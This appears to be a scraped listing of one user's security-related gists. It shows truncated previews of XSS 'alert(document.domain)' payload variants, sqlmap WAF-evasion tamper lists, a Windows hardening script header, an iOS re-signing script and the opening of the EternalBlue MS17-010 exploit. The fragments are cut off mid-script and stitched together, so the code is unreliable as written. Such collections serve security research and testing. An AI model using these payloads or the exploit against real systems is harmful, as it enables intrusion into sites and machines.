Yunus YILDIRIM th3gundy

Shadow Brokers EQGRP Lost in Translation resources - work in progress

scrapped from @x0rz,@etlow,@Dinosn,@hackerfantastic,@highmeh,@cyb3rops and others

	// How many ways can you alert(document.domain)?
	// Comment with more ways and I'll add them :)
	// I already know about the JSFuck way, but it's too long to add (:

	// Direct invocation
	alert(document.domain);
	(alert)(document.domain);
	al\u0065rt(document.domain);
	al\u{65}rt(document.domain);
	window['alert'](document.domain);

	#!/bin/bash
	# Usage : ./scanio.sh <save file>
	# Example: ./scanio.sh cname_list.txt

	# Premium
	function ech() {
	spinner=( "\|" "/" "-" "\\" )
	while true; do
	for i in ${spinner[@]}; do
	echo -ne "\r[$i] $1"

	# All scripts
	```
	--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
	```
	# General scripts
	```
	--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
	```
	# Microsoft access
	```

	:: Windows 10 Hardening Script
	:: This is based mostly on my own personal research and testing. My objective is to secure/harden Windows 10 as much as possible while not impacting usability at all. (Think being able to run on this computer's of family members so secure them but not increase the chances of them having to call you to troubleshoot something related to it later on). References for virtually all settings can be found at the bottom. Just before the references section, you will always find several security settings commented out as they could lead to compatibility issues in common consumer setups but they're worth considering.
	:: Obligatory 'views are my own'. :)
	:: Thank you @jaredhaight for the Win Firewall config recommendations!
	:: Thank you @ricardojba for the DLL Safe Order Search reg key!
	:: Thank you @jessicaknotts for the help on testing Exploit Guard configs and checking privacy settings!
	:: Best script I've found for Debloating Windows 10: https://github.com/Sycnex/Windows10Debloater
	:

	#!/bin/bash

	#
	# Script requires `brew`
	# - `/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"`
	#
	# Variables
	# - $IPA -> Source IPA
	# - $MOBILEPROVISION -> Source embedded.mobileprovision
	# find ~/Library/Developer/Xcode \| grep embedded.mobileprovision

	#!/usr/bin/python
	# This file has no update anymore. Please see https://github.com/worawit/MS17-010
	from impacket import smb
	from struct import pack
	import sys
	import socket

	'''
	EternalBlue exploit for Windows 7/2008 by sleepya
	The exploit might FAIL and CRASH a target system (depended on what is overwritten)

	import requests
	import sys
	import json


	def waybackurls(host, with_subs):
	if with_subs:
	url = 'http://web.archive.org/cdx/search/cdx?url=.%s/&output=json&fl=original&collapse=urlkey' % host
	else:
	url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host